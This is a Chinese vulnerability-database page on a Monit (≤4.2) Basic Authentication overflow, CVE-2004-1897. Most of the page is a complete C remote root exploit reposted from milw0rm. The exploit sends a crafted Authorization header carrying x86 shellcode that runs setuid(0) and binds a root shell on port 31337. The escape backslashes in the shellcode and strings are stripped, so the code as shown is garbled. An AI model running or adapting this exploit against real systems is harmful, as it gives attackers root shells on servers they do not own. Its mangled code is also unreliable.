多个Monit管理员接口远程漏洞
漏洞ID | 1107872 | 漏洞类型 | 未知 |
发布时间 | 2004-04-12 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-2004-1897 |
CNNVD-ID | CNNVD-200412-868 |
漏洞平台 | Linux | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
Monit1.4至4.2的管理员接口存在漏洞。远程攻击者可以通过发送不带密码的基本认证请求导致服务拒绝(段错误),该漏洞导致Monit减少空指针并引起越界读取。
|漏洞EXP
/*
* THE EYE ON SECURITY RESEARCH GROUP - INDIA
*
* www eos-india net poc 305monit.c
* Remote Root Exploit for Monit <= 4.2
* Vulnerability: Buffer overflow in handling of Basic Authentication informations.
* Server authenticates clients through:
* Authentication: Basic Base64Encode[UserName:Password]
* Here we are exploiting the insecure handling of username in Basic Authentication information to return
* control (EIP) to our payload.
*
* Nilanjan De [n2n linuxmail org] - Abhisek Datta [abhisek front ru]
*
* 06.04.2004
* www eos-india net
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
#define BUFF_SIZE 2048
#define PADDING 40
#define EXP_SIZE (256+4+PADDING)
#define MAX_ARCH 2
struct eos{
char *arch;
unsigned long ret;
} targets[] = {
"Monit-4.2-Gentoo",
0xbf7fef02,
//-------------------------------
"Monit <=4.2 Crash",
0xbadc0ded,
NULL,
0
};
/*
x86 linux portbind a shell in port 31337
based on shellcode from www.shellcode.com.ar
with a few modifications by us
*/
char shellcode[]=
/* sys_fork() */
"x31xc0" // xorl %eax,%eax
"x31xdb" // xorl %ebx,%ebx
"xb0x02" // movb $0x2,%al
"xcdx80" // int $0x80
"x38xc3" // cmpl %ebx,%eax
"x74x05" // je 0x5
/* sys_exit() */
"x8dx43x01" // leal 0x1(%ebx),%eax
"xcdx80" // int $0x80
/* setuid(0) */
"x31xc0" // xorl %eax,%eax
"x31xdb" // xorl %ebx,%ebx
"xb0x17" // movb $0x17,%al
"xcdx80" // int $0x80
/* socket() */
"x31xc0" // xorl %eax,%eax
"x89x45x10" // movl %eax,0x10(%ebp)(IPPROTO_IP = 0x0)
"x40" // incl %eax
"x89xc3" // movl %eax,%ebx(SYS_SOCKET = 0x1)
"x89x45x0c" // movl %eax,0xc(%ebp)(SOCK_STREAM = 0x1)
"x40" // incl %eax
"x89x45x08" // movl %eax,0x8(%ebp)(AF_INET = 0x2)
"x8dx4dx08" // leal 0x8(%ebp),%ecx
"xb0x66" // movb $0x66,%al
"xcdx80" // int $0x80
"x89x45x08" // movl %eax,0x8(%ebp)
/* bind()*/
"x43" // incl %ebx(SYS_BIND = 0x2)
"x66x89x5dx14" // movw %bx,0x14(%ebp)(AF_INET = 0x2)
"x66xc7x45x16x7ax69" // movw $0x697a,0x16(%ebp)(port=31337)
"x31xd2" // xorl %edx,%edx
"x89x55x18" // movl %edx,0x18(%ebp)
"x8dx55x14" // leal 0x14(%ebp),%edx
"x89x55x0c" // movl %edx,0xc(%ebp)
"xc6x45x10x10" // movb $0x10,0x10(%ebp)(sizeof(struct sockaddr) = 10h = 16)
"xb0x66" // movb $0x66,%al
"xcdx80" // int $0x80
/* listen() */
"x40" // incl %eax
"x89x45x0c" // movl %eax,0xc(%ebp)
"x43" // incl %ebx
"x43" // incl %ebx(SYS_LISTEN = 0x4)
"xb0x66" // movb $0x66,%al
"xcdx80" // int $0x80
/* accept() */
"x43" // incl %ebx
"x89x45x0c" // movl %eax,0xc(%ebp)
"x89x45x10" // movl %eax,0x10(%ebp)
"xb0x66" // movb $0x66,%al
"xcdx80" // int $0x80
"x89xc3" // movl %eax,%ebx
/* dup2() */
"x31xc9" // xorl %ecx,%ecx
"xb0x3f" // movb $0x3f,%al
"xcdx80" // int $0x80
"x41" // incl %ecx
"x80xf9x03" // cmpb $0x3,%cl
"x75xf6" // jne -0xa
/* execve() */
"x31xd2" // xorl %edx,%edx
"x52" // pushl %edx
"x68x6ex2fx73x68" // pushl $0x68732f6e
"x68x2fx2fx62x69" // pushl $0x69622f2f
"x89xe3" // movl %esp,%ebx
"x52" // pushl %edx
"x53" // pushl %ebx
"x89xe1" // movl %esp,%ecx
"xb0x0b" // movb $0xb,%al
"xcdx80"; // int $0x80
void show_help(char *pr00gie,u_short opt) {
int i=0;
printf("==========> THE EYE ON SECURITY RESEARCH GROUP <==========n");
printf("Monit <= 4.2 Remote Root Exploitn");
printf("n2n[at]linuxmail[dot]org - abhisek[at]front[dot]run");
printf("http://www.eos-india.netnn");
if(!opt)
return;
printf("[usage]n");
printf("%s [Remote Host] [Remote Port] [Target]n",pr00gie);
printf("[Available Targets]n");
while(targets[i].arch != NULL) {
printf("%d. - %st - %pn",(i),targets[i].arch,targets[i].ret);
i++;
}
}
/* Base 64 code ripped from monit src */
/**
* Base64 encode one byte
*/
static char encode(unsigned char u) {
if(u < 26) return 'A'+u;
if(u < 52) return 'a'+(u-26);
if(u < 62) return '0'+(u-52);
if(u == 62) return '+';
return '/';
}
/**
* Base64 encode and return size data in 'src'. The caller must free the
* returned string.
* @param size The size of the data in src
* @param src The data to be base64 encode
* @return encoded string otherwise NULL
*/
char *encode_base64(int size, unsigned char *src) {
int i;
char *out, *p;
if(!src)
return NULL;
if(!size)
size= strlen((char *)src);
out= (char *)malloc(sizeof(char)*size*4/3+4);
p= out;
for(i=0; i<size; i+=3) {
unsigned char b1=0, b2=0, b3=0, b4=0, b5=0, b6=0, b7=0;
b1 = src[i];
if(i+1<size)
b2 = src[i+1];
if(i+2<size)
b3 = src[i+2];
b4= b1>>2;
b5= ((b1&0x3)<<4)|(b2>>4);
b6= ((b2&0xf)<<2)|(b3>>6);
b7= b3&0x3f;
*p++= encode(b4);
*p++= encode(b5);
if(i+1<size) {
*p++= encode(b6);
} else {
*p++= '=';
}
if(i+2<size) {
*p++= encode(b7);
} else {
*p++= '=';
}
}
return out;
}
void make_http_request(char *buff,int size,char *host,unsigned long *magic) {
char *exp_buff;
char *exp_buff_encoded;
int i;
if (!(exp_buff=(char*)malloc(EXP_SIZE))){
perror("malloc()");
exit(1);
}
memset(exp_buff,0x90,EXP_SIZE);
strcpy(exp_buff+256-strlen(shellcode),shellcode);
for(i=256;i<EXP_SIZE-5;i+=4)
memcpy(exp_buff+i,magic,4);
strcpy(exp_buff+EXP_SIZE-4,":x");
exp_buff_encoded=encode_base64(EXP_SIZE,exp_buff);
memset(buff,0x00,size);
sprintf(buff,"GET / HTTP/1.0rn");
sprintf(buff,"%sHost: %srn",buff,host);
sprintf(buff,"%sAuthorization: Basic %srnrnrn",buff,exp_buff_encoded);
}
int main(int argc,char *argv[]) {
char *host;
char *b;
int rport;
int sockfd;
struct sockaddr_in sin;
struct hostent *h;
unsigned int n;
unsigned long magic;
if(argc != 4) {
show_help(argv[0],1);
exit(1);
}
host=argv[1];
rport=(atoi(argv[2]));
n=atoi(argv[3]);
if((n >= MAX_ARCH)||(n<0)) {
printf("- Invalid targetn");
show_help(argv[0],1);
exit(1);
}
magic=targets[n].ret;
show_help(argv[0],0);
printf("-Using RET %pn",magic);
printf("Resolving %st",host);
h=gethostbyname(host);
if(!h) {
printf("[ERROR]nUnable to resolve: %sn",host);
exit(1);
}
else
printf("[DONE]n");
b=(char*)malloc(BUFF_SIZE);
if(!b) {
perror("malloc");
exit(1);
}
sin.sin_addr=*((struct in_addr*)h->h_addr);
sin.sin_family=AF_INET;
sin.sin_port=htons((u_short)rport);
if((sockfd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){
perror("socket");
exit(1);
}
printf("Connecting to %s:%dt",host,rport);
if(connect(sockfd,(struct sockaddr*)&sin,sizeof(sin))<0) {
printf("[ERROR]nUnable to connect: %s:%dn",host,rport);
perror("connect");
exit(1);
}
else
printf("[DONE]n");
make_http_request(b,BUFF_SIZE,host,&magic);
if(send(sockfd,b,strlen(b),0) == strlen(b))
printf("Successfully send exploit stringn");
else
printf("Failed sending exploit stringn");
close(sockfd);
return 0;
}
// milw0rm.com [2004-04-12]
|参考资料
来源:BID
名称:10051
链接:http://www.securityfocus.com/bid/10051
来源:SECUNIA
名称:11304
链接:http://secunia.com/advisories/11304
来源:BUGTRAQ
名称:20040405Advisory:MultipleVulnerabilitiesinMonit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108119149103696&w;=2
来源:XF
名称:monit-basic-auth-dos(15734)
链接:http://xforce.iss.net/xforce/xfdb/15734
相关推荐: PWC.CGI Syslog Format String Vulnerability
PWC.CGI Syslog Format String Vulnerability 漏洞ID 1103313 漏洞类型 Input Validation Error 发布时间 2001-03-23 更新时间 2001-03-23 CVE编号 N/A CNNV…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666